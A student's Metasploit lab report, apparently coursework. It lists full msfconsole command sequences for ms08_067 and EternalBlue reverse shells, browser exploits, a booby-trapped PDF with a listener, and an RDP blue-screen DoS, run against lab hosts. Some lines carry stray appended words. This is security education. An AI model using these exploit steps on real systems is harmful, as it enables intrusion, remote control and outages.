2018-2019 20165226 Exp5 MSF基礎應用

2018-2019 20165226 Exp5 MSF基礎應用

目錄


1、實驗內容說明及基礎問題回答html

2、實驗過程shell

3、問題與思考windows

4、實驗總結api



1、實驗內容說明及基礎問題回答


一、實驗內容
本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:
(1) 一個主動攻擊實踐,如ms08_067; (1分)瀏覽器

(2)一個針對瀏覽器的攻擊,如ms11_050;(1分)安全

(3) 一個針對客戶端的攻擊,如Adobe;(1分)服務器

(4)成功應用任何一個輔助模塊。(0.5分)tcp

二、基礎問題回答
(1)用本身的話解釋什麼是 exploit , payload , encode.編碼

  • exploit
    滲透攻擊模塊,利用系統服務應用中的漏洞取得權限
  • payload
    一段代碼,用於滲透以後在目標主機上執行
  • encode
    用來對payload進行編碼,主要是爲了不「壞字符」和作到免殺

返回目錄3d



2、實驗過程

攻擊機kali——172.30.2.47
靶機:①WinXP——172.30.6.172②win2000——172.30.5.55

Task1 主動攻擊實踐


ms08_067

  • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連

msf exploit(ms08_067_netapi) > set LHOST 172.30.2.47 //攻擊機ip

msf exploit(ms08_067_netapi) > set LPORT 5226//攻擊端口

msf exploit(ms08_067_netapi) > set RHOST 172.30.6.172 //靶機ip,特定漏洞端口已經固定

msf exploit(ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高

msf exploit(ms08_067_netapi) > exploit //攻擊

  • 結果出現沒法建立會話界面

  • 查看targets,與本機做對比

  • 經過網上查找資料,發現xp中文版本打過補丁,因而換了一臺win2000的,攻擊成功

  • 輸入ipconfig/all,獲取相關的MAC地址、IP地址、子網掩碼、網關地址以及DNS

ms17_010

攻擊:kali
靶機:①win2000②winxp③win2008

  • 進入msfconsole
  • 輸入如下指令
search ms17-010 #搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue    #選擇漏洞
show payloads   #查看可用攻擊載荷
set payload windows/x64/meterpreter/reverse_tcp #選擇攻擊載荷
options

  • 再輸入如下指令:
set RHOST 172.30.2.111 #設置攻擊ip
set LHOST 172.30.2.47   #設置監聽主機
set LPORT 5226  #設置監聽端口
  • 失敗

  • 嘗試更換虛擬機,終於,成功

Task2 針對瀏覽器的攻擊

攻擊機kali——172.30.2.47
靶機:①Win2000②win2007

ms11_050

  • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用瀏覽器ms11_050漏洞
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連
msf exploit(ms11_050_cobjectelement) > set LHOST 172.30.2.47 //攻擊機ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5226 //攻擊端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5226lxs //統一資源標識符路徑設置
msf exploit(ms11_050_cobjectelement) > exploit

  • 在瀏覽器輸入http://172.30.2.47:8080/5226lxs,IE沒法訪問

  • 設置瀏覽器的安全級別以下

  • 仍然不行,從新換一臺虛擬機
  • 在設置Internet選項後還是會出現IE瀏覽器的錯誤

browser_autopwn

  • 換一個漏洞實施browser_autopwn模塊
    • 攻擊機裏進入msfconsole,而後分別輸入
use auxiliary/server/browser_autopwn2

set SRVHOST 172.30.2.47

set URIPATH auto

show options
  • 開始攻擊,能夠看到msf在不停的嘗試不一樣的payload

  • 嘗試成功,輸出了可被訪問的URLhttp://172.30.2.47:8080/auto並啓動服務器

  • 失敗again

Task3 對客戶端的攻擊,如Adobe

  • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回連

msf exploit(adobe_cooltype_sing) > set LHOST 172.30.2.47 //攻擊機ip

msf exploit(adobe_cooltype_sing) > set LPORT 5226//攻擊端口

msf exploit(adobe_cooltype_sing) > set FILENAME 20165226.pdf //設置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻擊
  • 將生成的pdf文件拷貝到靶機上

  • 在kali上輸入back退出當前模塊,進入監聽模塊,輸入如下命令:
msf > use exploit/multi/handler //進入監聽模塊

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向鏈接

msf exploit(handler) > set LHOST 172.30.2.47 //攻擊機ip

msf exploit(handler) > set LPORT 5226 //攻擊端口固定

msf exploit(handler) > exploit

  • 在靶機上打開20165226.pdf文件

  • 攻擊機顯示攻擊成功

  • 靶機關閉PDF文件則失去權限

Task4 成功應用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模塊(惟一)

攻擊:kali
靶機:win2008

  • 使用命令show auxiliary查看全部的輔助模塊
  • 使用MS12-020(CVE-2012-0002)藍屏攻擊
  • 進入msfconsole
  • 輸入如下指令
search ms12-020 #搜索漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids    #使用漏洞
options #查看配置信息
set RHOST 172.30.2.47 #設置攻擊IP
exploit #開始攻擊
  • 攻擊成功

返回目錄



3、問題與思考

  • 問題1:在進行ms08_067_netapi攻擊時出現如下狀況

  • 問題1解決方案:
    • 首先查看targets

    • 換另外一臺虛擬機,再次運行,攻擊成功

返回目錄

4、實驗總結

本次實驗學會了如何搜索漏洞,並在現有的漏洞環境下,嘗試利用漏洞進行直接或間接主動攻擊客戶端。在整個過程當中,其實找適合的虛擬機特別關鍵,整個過程耗費的時間大量集中在嘗試不一樣虛擬機使其得以被攻擊。不乏看出,打過補丁的虛擬機其抗攻擊能力更強,這也提醒咱們應時常更新配置。

返回目錄

相關文章
相關標籤/搜索